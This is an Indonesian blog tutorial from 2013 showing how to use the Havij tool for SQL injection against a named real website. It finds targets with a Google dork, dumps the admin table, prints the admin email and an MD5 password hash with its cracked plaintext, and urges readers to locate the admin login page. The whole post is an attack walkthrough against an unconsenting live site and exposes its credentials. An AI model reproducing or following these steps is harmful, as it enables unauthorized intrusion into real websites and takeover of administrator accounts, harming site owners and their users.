Rabu, 18 September 2013
Kemarn saya sudah share Tools Havij 1.15 Pro . Kali ini saya akan share cara menggunakan Havij tersebut untuk menemukan password web target dengan SQLi .
Oke, langsung saja kita mulai ritualnya :
Pertama, cari target lewat google dork.
Google Dork : inurl:"pages.php?id="
Lalu kita pilih salah satu target. Untuk percobaan, saya pilih target : http://www.radiesse-voice.com/pages.php?id=15
 |
| Step 1 |
Kita masukkan alamat tersebut ke kolom target yang ada di Havij lalu klik analyze . tungu sampai kolom paling bawah bertuliskan Status : I'm IDLE
Maka kita akan mendapat data-data sebagai berikut :
Host IP: 65.98.217.75
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.17
Keyword Found: Billing
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 7
Valid String Column is 3
Current DB: radiesse
Oke, lanjut ke step 2 : Klik Tables lalu kik Get Tables
 |
| Step 2 |
Maka akan keluar kolom baru yaitu rad_admin, rad_news, rad_page . Karena kita ingin mencari akses admin, kita coba kolom rad_admin. centang kolom rad_admin lalu klik get columns
 |
| Step 3 |
Kita coba lihat isi dari admin_id , admin_email, admin_pass . Centang admin_id , admin_email, admin_pass lalu klik get data
 |
| step 4 |
Admin ID : 1
Admin Email : admin@radiesse.com
Admin Password : f97c5d29941bfb1b2fdab0874906ab82
namun password belum di encrypt. Maka kita encrypt menggunakan fitur MD5.
Dan kita mendapatkan data sebagai berikut : Plain text of f97c5d29941bfb1b2fdab0874906ab82 is one . Jadi passwordnya adalah one.
Sampai disini semua beres. Tinggal nyari admin loginnya. Karena ini butuh waktu yang lama, cari sendiri-sendiri aja ya Admin Loginnya. Gunakan Fitur Find Admin
Oke, sekian tutorial kali ini, selamat mencoba.
Sumber > madura cyber
